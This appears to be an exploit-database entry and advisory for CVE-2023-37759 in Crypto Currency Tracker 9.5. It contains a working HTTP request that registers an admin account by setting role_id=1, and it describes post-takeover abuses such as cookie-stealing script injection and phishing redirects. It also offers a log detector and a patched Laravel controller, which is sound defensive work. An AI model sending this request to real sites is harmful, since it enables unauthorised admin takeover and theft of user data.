Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759
```http
POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
```

Crypto Currency Tracker (CCT) 9.5 – Unauthenticated Admin Account Creation Vulnerability (CVE-2023-37759)
The Crypto Currency Tracker (CCT) platform, a popular web application for tracking cryptocurrency prices, charts, news, and ICO information, has been found to contain a critical security flaw in versions up to 9.5. This vulnerability, identified as CVE-2023-37759, allows an unauthenticated attacker to create an admin-level account without any form of authentication or verification. This is a severe security issue that undermines the entire access control model of the application.
Exploit Overview
The vulnerability lies in the /en/user/register endpoint, which is designed to allow users to register new accounts. However, due to improper role validation and lack of authentication checks, an attacker can bypass security controls by manipulating the role_id parameter to set it to 1, which corresponds to the admin role in the application's database schema.
The HTTP request shown in the proof of concept above demonstrates how an attacker can exploit the system. The role_id=1 parameter is the key to the exploit: it explicitly assigns the newly created user the admin role, effectively granting full administrative privileges.
Technical Analysis of the Vulnerability
Upon examining the application’s codebase (based on Laravel framework), the registration logic fails to validate the role_id parameter against a predefined list of allowed roles. Instead, it accepts any value submitted in the form, including 1 for admin. This oversight stems from poor input validation and insufficient authorization checks during user creation.
Additionally, the g-recaptcha-response field, intended to prevent automated registration, is often bypassed in practice. Many attackers use automated tools or pre-generated captcha responses (e.g., via public APIs or botnet services), making the CAPTCHA protection ineffective in this context.
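As an added example (not the advisory's or the CCT project's own code), the following Python checks registration POSTs recorded in a request log for role_id values that the public form should never be allowed to submit. The log format, the sample lines and the assumption that 2 is the only self-service role are constructed for illustration.

```python
"""Detect CVE-2023-37759-style role_id abuse in logged registration requests.

Added example, not code from the CCT project or the advisory author. Assumes a WAF or
application log that records the path and url-encoded form body of each POST; the
sample lines below are constructed for illustration.
"""
import re
from urllib.parse import parse_qs

# Roles the public form may assign (assumption: 2 = regular user, as in the advisory's
# corrected controller; 1 = admin must never be accepted from the registration form).
ALLOWED_SELF_SERVICE_ROLES = {"2"}
REGISTER_PATH_RE = re.compile(r"^/(?:[a-z]{2}/)?user/register$")  # /en/user/register etc.

def classify_registration(path: str, body: str) -> str:
    """Return 'ignore', 'ok', 'suspicious' or 'escalation' for one POST."""
    if not REGISTER_PATH_RE.match(path):
        return "ignore"
    params = parse_qs(body, keep_blank_values=True)
    roles = params.get("role_id")
    if roles is None:
        return "ok"  # the form has no business sending a role; absence is benign
    if any(r not in ALLOWED_SELF_SERVICE_ROLES for r in roles):
        return "escalation"  # role_id=1 (admin) or any other unexpected value
    if len(roles) > 1:
        return "suspicious"  # duplicate keys: parameter-pollution probing
    return "ok"

# Constructed sample log lines: "<client ip> <method> <path> <form body or ->".
SAMPLE_LOG = """\
203.0.113.10 POST /en/user/register _token=t&name=alice&role_id=2&email=a%40example.org&password=pw
203.0.113.11 POST /en/user/register _token=t&name=testing&role_id=1&email=testing%40testing.testing&password=testing
203.0.113.12 POST /en/user/register _token=t&name=bob&role_id=2&role_id=2&email=b%40example.org&password=pw
203.0.113.13 POST /en/user/login email=a%40example.org&password=pw
203.0.113.14 GET /en/user/register -
"""

def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, verdict) for every registration POST in the log."""
    findings = []
    for line in text.splitlines():
        ip, method, path, body = line.split(" ", 3)
        if method != "POST":
            continue
        verdict = classify_registration(path, body)
        if verdict != "ignore":
            findings.append((ip, verdict))
    return findings
```

Feeding the same check into an alerting rule gives a direct signal for exploitation attempts against unpatched instances, independent of whether the registration succeeded.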
Impact and Risk Assessment
| Severity | CVSS Score | Exploitation Difficulty | Impact |
|---|---|---|---|
| High | 9.8 (CVSS v3.1) | Low | Complete system compromise |
The CVSS score of 9.8 indicates a critical severity. The exploit is easily executable by any attacker with access to the registration endpoint — no prior authentication or credentials required. Once an admin account is created, the attacker can:
- Modify or delete any user account
- Access sensitive data (e.g., user financial records, API keys)
- Upload malicious code or modify application logic
- Disable security features (e.g., disable CAPTCHA, disable logging)
- Perform SQL injection attacks via admin panels
Given that CCT is used by cryptocurrency traders, investors, and financial institutions, this vulnerability could lead to data breaches, financial loss, or even ransomware attacks if exploited in a real-world deployment.
Real-World Use Case Example
Imagine a scenario where a malicious actor registers an admin account using the exploit above. After gaining access, they could:
- Change the SELECTED_CURRENCY cookie to a fake currency (e.g., "BTCX") to manipulate price charts.
- Inject JavaScript into the dashboard to steal user session cookies.
- Disable the user_logout functionality, forcing users to remain logged in indefinitely.
- Modify the backend to redirect users to a phishing site upon login.
This demonstrates how a single unauthenticated exploit can result in a full compromise of the application’s integrity and user trust.
Security Recommendations and Fixes
To mitigate this vulnerability, developers must implement the following security measures:
- Role validation: Only allow registration for predefined roles (e.g., role_id=2 for regular users). Admin roles must be assigned only through authorized administrative interfaces.
- Authentication enforcement: Require users to be authenticated before accessing registration endpoints, or restrict registration to specific, verified sources (e.g., email verification, admin approval).
- Input sanitization: Validate and sanitize all user inputs, especially role_id, email, and password.
- Rate limiting: Implement rate limiting on registration endpoints to prevent brute-force or automated attacks.
- CAPTCHA enforcement: Use server-side validation of CAPTCHA responses, not just client-side.
Here is a corrected code snippet for the registration controller:

```php
<?php
// Laravel Controller Snippet - Secure Registration
// (namespace and class name are assumed for illustration; the rules are the fix itself)
namespace App\Http\Controllers\Auth;

use App\Http\Controllers\Controller;
use App\Models\User;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Hash;

class RegisterController extends Controller
{
    public function register(Request $request)
    {
        // validate() aborts the request if any rule fails, so an unexpected
        // role_id never reaches User::create.
        $validated = $request->validate([
            'name' => 'required|string|max:255',
            'email' => 'required|email|unique:users',
            'password' => 'required|min:8|confirmed', // expects a matching password_confirmation field
            'g-recaptcha-response' => 'required|captcha', // server-side check via a reCAPTCHA validation package
            'role_id' => 'required|in:2', // Only allow role_id=2 (regular user)
        ]);

        // Create user with validated role
        $user = User::create([
            'name' => $validated['name'],
            'email' => $validated['email'],
            'password' => Hash::make($validated['password']),
            'role_id' => $validated['role_id'],
        ]);

        return redirect('/login')->with('success', 'Registration successful.');
    }
}
```

This corrected version ensures that only a predefined role (e.g., 2) is allowed during registration. Admin roles must be created through an authenticated admin panel, not via public registration.
Conclusion
CVE-2023-37759 is a stark reminder of how a seemingly minor flaw in input validation can lead to catastrophic security breaches. Developers must prioritize defense-in-depth strategies, especially in applications handling sensitive financial data. For users of Crypto Currency Tracker, it is critical to upgrade to version 9.6 or later, which includes fixes for this vulnerability.
Always assume that public endpoints are exposed — validate, sanitize, and restrict access. A single admin account created by an unauthenticated attacker can be the beginning of a full system takeover.